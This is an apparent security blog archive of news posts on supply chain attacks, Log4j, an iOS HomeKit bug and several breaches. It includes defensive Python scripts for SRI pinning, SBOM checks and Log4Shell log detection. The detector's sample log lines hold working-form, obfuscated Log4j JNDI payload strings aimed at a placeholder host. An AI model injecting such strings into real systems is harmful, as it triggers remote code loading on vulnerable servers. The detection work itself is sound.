Category Archives: Hacks

Supply Chain Attacks Are Rampant

Today’s supply chain attack is interesting. I guess I can say that because it didn’t happen to a web site that I own and my information didn’t get stolen.

Here is the situation. Many web sites have embedded videos on them. In this case, most of the sites affected were real estate web sites and they often have virtual tour videos on the web page. In order to play a video, you need a video player. There are many video players that you can choose from, but what almost no one does is write their own video player.

Palo Alto Networks found over a hundred web sites, many or most of them (depending on which story you read) belonging to the real estate firm Sotheby’s.

What happened? Somehow a malicious version of the video player got loaded onto these web sites. When a visitor went to one of the sites, the video player code was downloaded to the visitor’s computer. In this case, the malware was a data skimmer, which steals information that the user provides to the website. It could be name and address information or it could be credit card information. That information can be used for social engineering or financial crimes.

The malware is polymorphic, meaning that no two copies of the malware are the same, which makes it difficult to detect and block. The code is also obfuscated, which makes it difficult to read and understand, so even if you tried to figure out whether it was malicious, it is unlikely that you could.

Now that this particular attack has become public, hackers all over the world are going to copy it. All it takes is a web site hosting the code with lax security. The hacker can then compromise the code and wait for a developer to use it.

This is not at all limited to video players, even though there are thousands of them. Any bit of shared code that is hosted in the cloud and linked to by developers is a valid target.

This means that you need to have a robust software supply chain risk management program in place, unless you want to be like these firms, dealing with a shattered reputation.
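One concrete control against exactly this kind of swapped-out hosted script is Subresource Integrity (SRI): you record a hash of the vetted copy of the script, put it in the script tag, and the browser refuses any copy whose bytes differ. The script below is an added example (it is not code from the post or from any of the companies mentioned); the player script, the CDN URL and the "tampered" copy are constructed stand-ins. It builds the integrity attribute and also shows a server-side check that reports when the hosted copy has drifted from the pinned hash.

```python
"""
Added example (not the post's own code): pin a third-party script with a
Subresource Integrity (SRI) hash so the browser refuses a copy whose bytes have
changed, and detect such drift on the server side. All inputs are constructed.
"""
import base64
import hashlib
import hmac

# Constructed stand-in for a vendor's video-player script served from a CDN.
PLAYER_URL = "https://cdn.example/player.js"
ORIGINAL_PLAYER_JS = b"(function(){window.Player={play:function(){}};})();"
# Constructed stand-in for a copy that was modified after it was vetted.
TAMPERED_PLAYER_JS = ORIGINAL_PLAYER_JS + b"\n/* bytes that were not in the vetted copy */"

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the digests browsers accept for SRI


def sri_hash(body: bytes, algorithm: str = "sha384") -> str:
    """Return the integrity value for `body`: '<algorithm>-<base64 digest>'."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the <script> tag a site should embed once it has vetted `body`."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(expected: str, body: bytes) -> bool:
    """True only if `body` hashes to the pinned integrity value."""
    algorithm, sep, _ = expected.partition("-")
    if not sep or algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"malformed integrity value: {expected!r}")
    return hmac.compare_digest(sri_hash(body, algorithm), expected)


def find_drift(pinned: dict, fetched: dict) -> list:
    """Return the URLs whose freshly fetched body no longer matches the pinned hash.

    `pinned` maps URL -> integrity value recorded when the script was vetted;
    `fetched` maps URL -> bytes retrieved now (constructed here, normally downloaded).
    A URL that could not be fetched at all is reported too.
    """
    return [url for url, integrity in pinned.items()
            if url not in fetched or not verify_sri(integrity, fetched[url])]


if __name__ == "__main__":
    pinned = {PLAYER_URL: sri_hash(ORIGINAL_PLAYER_JS)}
    print(script_tag(PLAYER_URL, ORIGINAL_PLAYER_JS))
    print("unchanged copy drifted:", find_drift(pinned, {PLAYER_URL: ORIGINAL_PLAYER_JS}))
    print("tampered copy drifted:", find_drift(pinned, {PLAYER_URL: TAMPERED_PLAYER_JS}))
```

Two caveats worth knowing. SRI only covers resources the browser loads directly with `src` or `href`; if the player itself fetches further scripts at runtime, those are not covered by the page's hash. And a legitimate vendor update changes the hash and breaks the page, which is the point: the new copy has to be reviewed and re-pinned rather than picked up silently, and the drift check above tells you when that has happened.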

If you need help with this, please contact us.

Credit Threatpost and Bleeping Computer

Apple iOS in the Doghouse Again

iOS devices running 14.7 through 15.2 – basically all devices – are subject to a denial of service attack that forces the user to do a factory reset, wiping all of the user’s data.

If the user logs in to iCloud to restore the data, the denial of service attack will replay once the data is restored, resulting in a “rinse and repeat” cycle.

Apple was told about the bug last August but has not mitigated it. As a result, the researcher who discovered it has publicly disclosed it and created a proof of concept app to demonstrate it.

Apple has repeatedly said that they would fix it, but have not.

The bug is related to the HomeKit software, which does home automation, and, apparently, it does not matter whether you are doing any home automation or not. If the hacker manages to create a device name of more than 500,000 characters, which can be done in a number of ways, the iDevice goes into cardiac arrest.

For more technical details on how the attack works, read the article at the link.

Since all good attacks need a catchy name, this one is called DoorLock.

Apple did quietly create a partial mitigation in 15.1, if you know about it and use it. The attack creates a device name of more than 500,000 characters, causing the iDevice to go belly-up. There is a way to limit the device name length, but it is not set by default (why?). My guess is that maybe a half dozen Apple employees have set this to protect themselves.

One bright spot is that the hacker would either need to have access to your “home” or get you to manually accept an invitation to one. The second seems easier than the first, using a pretty vanilla social engineering scam.

If you don’t have your data backed up, you are, as they say, in a world of trouble.

There is a way, if you know what is going on, to mitigate the “rinse and repeat” loop to restore your data from iCloud, so all is not lost, but it could be very stressful.

You are now warned. Credit: Bleeping Computer

Security News for the Week Ending December 31, 2021

W. Va. Hospital Breach Timeline – Way Too Long

The Monongalia Health System was attacked recently and hackers had access to several email accounts, apparently belonging to contractors, from May 10 to August 15, or about three months. It took them another 60 days to investigate. They are just now telling us about the breach – more than 7 months after it started. They only figured out that they were hacked because a vendor said that they were not paid (a standard business email compromise attack). They will, no doubt, get whacked by the feds, but this is a lesson to everyone that your vendors are your risk too. Credit: ZDNet

Java Code Repo Riddled with Hidden Log4j Bugs

Remember that you should assume that any code that you download from the net is full of bugs and security holes. If you assume that and you are lucky, then that is good; if you assume the reverse and you are not lucky, well, not so good. Threatpost is reporting that there are 17,000 unpatched Log4j packages in the Maven Central ecosystem. Many of those will never be patched. CAVEAT EMPTOR

Fallout from Kronos Ransomware Attack – Some Employees Not Receiving Full Pay

Kronos, the international HR firm, suffered a ransomware attack several weeks ago. Some employees at appliance maker Electrolux are saying that they are still not receiving their full wages or, in some cases, not getting paid at all. In most states the law is pretty specific about paying employees, so if you don’t want to be on the wrong end of an investigation, create a disaster recovery plan. Credit: Cyber News

North Korean Hackers Stole $1.7 Billion as an Investment

North Korea considers cryptocurrency a long term investment. As a result, when they steal billions in crypto, instead of selling it, they save it. Maybe that is not a bad strategy. Bitcoin, for example, was worth $313 in 2015, $997 in 2017, $3869 in 2019 and $46,847 right now. So if you stole 1 coin in 2015, your “investment” returned 150x today; that is, your $313 crime is worth $46,847. Maybe the North Koreans are onto something. Credit: Dailycoin

Oops, The Dog Ate 77 TB of Our Backups

Well, not exactly, but something ate the backups. Kyoto University in Japan lost 77 terabytes of data when a backup process went wild on their HP supercomputer. The event happened in mid-December when 34 million files were wiped from the system and the backups. The University determined that some of the data cannot be restored. The University has not said how this happened or what the impact of this failed backup process is. Credit: Bleeping Computer

Security News for the Week Ending December 24, 2021

Russian Hackers Make Millions by Stealing SEC Earning Reports

A Russian hacker working for a cybersecurity company has been extradited to the U.S. for hacking into the computer networks of two SEC filing agents used by multiple companies to file their quarterly and annual SEC reports. Using that insider information, the hacker traded stock in advance of the earnings being made public and earned millions. The hacker made the mistake of visiting Switzerland. I guess he figured that the U.S. did not know who he was. He was wrong. Credit: Bleeping Computer

Security Flaw Found in Popular Hotel Guest WiFi System

I always tell people not to use hotel guest WiFi systems because they are not secure. A researcher says that an Internet gateway used by hundreds of hotels for guest WiFi is not secure and could put guests’ personal information at risk. The gateway, from Airangel, uses extremely easy-to-guess, hardcoded passwords. You can pretty much guess the rest. Credit: Tech Crunch

Feds Recover $154 Million in Bitcoin Stolen by Sony Employee

The U.S. has taken legal action to seize and recover $154 million stolen from Sony Life Insurance by an employee in a very basic business email compromise attack. The funds were supposed to be transferred between company accounts but were diverted. The hacker was not very smart, was in a country friendly to the U.S. (Japan), used a U.S. bank account and a Coinbase Bitcoin account, making it pretty easy to recover once found. The FBI managed, somehow, to obtain the private key for the hacker’s Bitcoin wallet, which made recovering the funds even easier. What the FBI has not disclosed is how they were able to recover the private key, probably because they do not want to disclose methods. Score one for the good guys. Credit: Bleeping Computer

Former Uber CSO Faces New Charges for Breach Cover-Up

Here is a tip about covering up a breach. Joe Sullivan, Uber’s Chief Security Officer between 2015 and 2017, faces more charges of covering up Uber’s breach. This time it is deliberately covering up a felony, which could bring him 8 years in prison and a $500,000 fine. Knowing Uber, they are probably not paying his legal costs. Moral: don’t lie. Credit: Data Breach Today

Russia Surging Both Tanks and Cyberattacks on Ukraine

In addition to moving 175,000 soldiers to the Ukraine border as Ukraine plans to join NATO, Russia is also stepping up cyberattacks on Ukraine’s financial system and critical infrastructure. In response, the US, UK and other friendly (NATO) countries have sent cyber experts to Ukraine to help defend their digital frontier. What war looks like now. Credit: Data Breach Today

Security News for the Week Ending December 17, 2021

The Gift That Keeps on Giving – Log4j – List of Affected Vendors

First, get used to hearing about this. It will be haunting us for months, at least. Jen Easterly, current head of DHS’s CISA, formerly at NSA and a professor at the US Military Academy at West Point, says this may be THE WORST vulnerability she has seen in her career. As of Monday, here is a list of affected vendors. If you use any of these vendors, and it looks like a who’s who of computer software, watch for patches. Second, it looks like the first patch for Log4j, 2.15, didn’t close the hole and now there is a new release, 2.16. This will keep evolving, so if you are a company that uses software, this applies to you.

From Friday through Tuesday researchers tracked more than 840,000 attempted attacks looking for the Log4J vulnerability. They are only getting started. Credit: Ars Technica

Hackers Hit Third Cryptocurrency Company This Month-Total Haul is Over $400 Mil

Vulcan Forge is the next cryptocurrency company to get hit by hackers. They stole about $135 million from them. If you get the sense that cryptocurrency software is buggy and processes are weak, you have it about right. In Vulcan Forge’s case, since it is decentralized, there is no central authority to block the movement of stolen currency. This is not going to end anytime soon. Credit: Vice

Apple AirTags Make a Wonderful Stalking Tool

Stalkers are using Apple AirTags to stalk people. A woman in Arkansas, for example, got into her car and her iPhone told her that an AirTag was following her. She found the tag on her trunk. If a stalker tried to hide it, say under her car somewhere, it would be more difficult to find. Apple says that Android users can detect a rogue AirTag because it will beep if it is separated from its owner for more than three days (assuming that is the case).

Credit: Apple Insider and Daily Kos. Apple has released an Android app to detect rogue trackers, but how many Android users are going to even think of downloading an Apple app? Credit: PC Mag

Feds Don’t Quite Handle Incident Response

A backdoor in the network of the United States Commission on International Religious Freedom has allowed attackers to intercept, and likely exfiltrate, all local network traffic on the agency’s systems. Security firm Avast discovered the intrusion in May, spoke to the agency’s executive director and even talked to CISA. After getting no follow-up for months, Avast published their findings. Avast says that, due to the lack of communication from the agency, they don’t know whether the problem was fixed. They have since reached out to other agencies and NGOs focused on international rights to warn them. Maybe the agency fixed the problem right away? Who knows? Credit: Data Breach Today

Log4j Vulnerability Impact Grows

Log4j is a very popular server logging package used across the Internet on Linux servers and other devices. This package is used not only in corporate software development environments, but also by very well known companies like Apple. It is also used in IoT devices and other appliances.

DHS’s CISA has created a web page with guidance, here and has also put out an alert, here.

Unfortunately, due to the current state of the software industry, users will have difficulty knowing whether any software that they run themselves, or that they use running in the cloud, is impacted.

If vendors were required to provide a software “bill of materials”, something which is being mandated for software used by the federal government as a result of the President’s Cybersecurity EO, then consumers like you and me would have a chance at knowing what software is impacted.

For those with a strong IT department, some vendors have released detection tools for businesses to figure out if they are running software that is vulnerable. (For example, here is Datto’s announcement, but you have to be running their management software.)
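To show what the “bill of materials” point above buys you in practice, here is an added example (not the post’s own code and not any vendor’s tool) that walks a CycloneDX-style SBOM and lists every log4j-core component older than the release this post treats as fixed, 2.16. The SBOM is constructed for the example, and the 2.16.0 threshold is an assumption taken from the post; adjust it to whatever the current vendor advice says. It checks log4j-core specifically, since that is the artifact containing the JNDI lookup, not log4j-api.

```python
"""
Added example (not the post's own code or any vendor's tool): walk a
CycloneDX-style SBOM and report every log4j-core component whose version is
below the release the post treats as fixed. The SBOM below is constructed.
"""
import json
import re
from typing import Iterator

LOG4J_GROUP = "org.apache.logging.log4j"
VULNERABLE_ARTIFACT = "log4j-core"   # the JNDI lookup lives in log4j-core, not log4j-api
FIXED_VERSION = (2, 16, 0)           # assumption from the post; update to current advice

# Constructed SBOM: one direct log4j-core 2.14.1, one 2.15.0 nested inside an
# application component, one already on 2.16.0, plus unrelated libraries.
SBOM_JSON = """{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1"},
    {"type": "application", "name": "billing-service", "version": "3.2.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.15.0"}
     ]},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.16.0"},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind", "version": "2.13.0"}
  ]
}"""


def parse_version(version: str) -> tuple:
    """Turn '2.14.1' (or '2.15.0-rc1') into a tuple of integers that compares correctly."""
    core = re.match(r"[\d.]+", version)
    if core is None:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(part) for part in core.group(0).strip(".").split("."))


def iter_components(node: dict) -> Iterator[dict]:
    """Yield every component, including ones nested inside other components."""
    for component in node.get("components", []):
        yield component
        yield from iter_components(component)


def find_unpatched_log4j(sbom: dict, fixed: tuple = FIXED_VERSION) -> list:
    """Return 'group:artifact@version' for each log4j-core older than `fixed`."""
    findings = []
    for component in iter_components(sbom):
        if component.get("group") != LOG4J_GROUP or component.get("name") != VULNERABLE_ARTIFACT:
            continue
        version = component.get("version", "")
        if parse_version(version) < fixed:
            findings.append(f"{LOG4J_GROUP}:{VULNERABLE_ARTIFACT}@{version}")
    return findings


if __name__ == "__main__":
    for finding in find_unpatched_log4j(json.loads(SBOM_JSON)):
        print("needs patching:", finding)
```

The nested walk matters: an SBOM often lists a vendor’s application as one component with its own dependencies underneath, and a flat scan of the top-level list would miss the 2.15.0 copy hiding inside billing-service. That is the same blind spot the post describes for software “running in the cloud” that you use but did not build.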

CISA created a “must patch” list for executive branch agencies a month or two ago. This list includes bugs that agencies must patch and this bug was added to the list, along with 12 others.

SC Magazine says that the cleanup from this will take months, at least. Some companies will not be responsible and will not spend the time to clean up their part of the mess (i.e., patch their vulnerable software). If they don’t tell us that their software is vulnerable – and legally they are not required to – then we will continue to use it, not understanding that our systems and our data are at risk.

If this bug is exploited, and it can be exploited remotely, all data on the impacted system is at risk!

It is also important to understand that hackers, who are ALREADY exploiting this bug, will add back doors into infected systems so that even after the bug is patched, the hackers will remain inside many networks, lurking undetected.

There are many cases of hackers remaining inside corporate networks, undetected, for years.
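Since the attackers are already scanning (the earlier item counted more than 840,000 attempts in a few days), one thing a defender can do while waiting for vendor patches is to look for the lookup string in web-server logs. The script below is an added example (not from the post and not any vendor’s detection tool). It undoes the nested lookup tricks commonly used to hide the JNDI lookup, then flags lines that contain it; the access-log lines, addresses and the lookup hostname are all constructed. Note the benign line mentioning a “jndi-tutorial” URL, which the detector correctly ignores because it only triggers on an actual lookup expression.

```python
"""
Added example (not from the post or any vendor's tool): flag web-server log
lines carrying the Log4j JNDI lookup string, after undoing the nested lookup
tricks used to hide it. Log lines, addresses and hostnames are constructed.
"""
import re

# Constructed combined-format access log lines; the lookup host is a placeholder.
SAMPLE_LOG = [
    '198.51.100.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://lookup-host.example/a}"',
    '198.51.100.9 - - [12/Dec/2021:10:01:09 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:l}dap://lookup-host.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.12 - - [12/Dec/2021:10:02:00 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://lookup-host.example/c}"',
    '198.51.100.7 - - [12/Dec/2021:10:03:00 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: nothing that opens or closes another lookup inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup that vulnerable Log4j versions resolve over the network.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Replace one innermost lookup with the literal text it would produce."""
    body = match.group(1)
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):      # ${lower:X} -> x
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):      # ${upper:x} -> X
        return body[len("upper:"):].upper()
    return match.group(0)                 # unknown lookup: keep as written


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(lines) -> list:
    """Return (line_number, source_ip, normalized_line) for each flagged line.

    The source IP is taken from the first field, which assumes the common
    combined log format shown in SAMPLE_LOG.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if JNDI_LOOKUP.search(normalized):
            hits.append((number, line.split(" ", 1)[0], normalized))
    return hits


if __name__ == "__main__":
    for number, source, normalized in scan(SAMPLE_LOG):
        print(f"line {number} from {source}: {normalized}")
```

Two things to keep in mind when using something like this. The normalizer only handles the lookup forms it knows about (lower, upper and the default-value syntax), so it is a detection heuristic and not a proof that a system is clean; and a hit tells you someone tried, not that the attempt succeeded. Pair it with the post’s other advice: the real fix is patching, and a hit on a host that was unpatched at the time is a reason to look for the backdoors described above.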

Given that there are 3 billion or so devices running Java, some percentage of those need to log, and this is the go-to package. Many of those devices will never be patched and will always be a hole into your network.

Among vendors that we think are impacted are Amazon’s AWS, Broadcom, Cisco, Connectwise, Fortinet, HCL, IBM, N-Able, Okta, VMware and likely hundreds of others. Not all products from these vendors are affected.

Businesses need to hold their vendors accountable. Unless you are a big company with clout you probably can’t force your vendors to be accountable, but if you don’t ask, you certainly won’t get information.

Also, all users need to stay current on all patches. Hopefully, most vendors will be responsible and release patches. This is one place where small companies get to benefit from large businesses’ ability to beat up the same vendors that you use.

Users get to be vigilant. Probably vendors will be releasing patches over the next few months. This one will not be over soon. Vendors may release alerts and workarounds.

If you are running any old, unsupported software, you are basically on your own. Not only will you not get any patches, you probably won’t even know that you are running affected software.

Also remember that if your vendor gets hacked as a result of this bug, you are both responsible and likely legally liable. Just saying.

If you have questions, please contact us.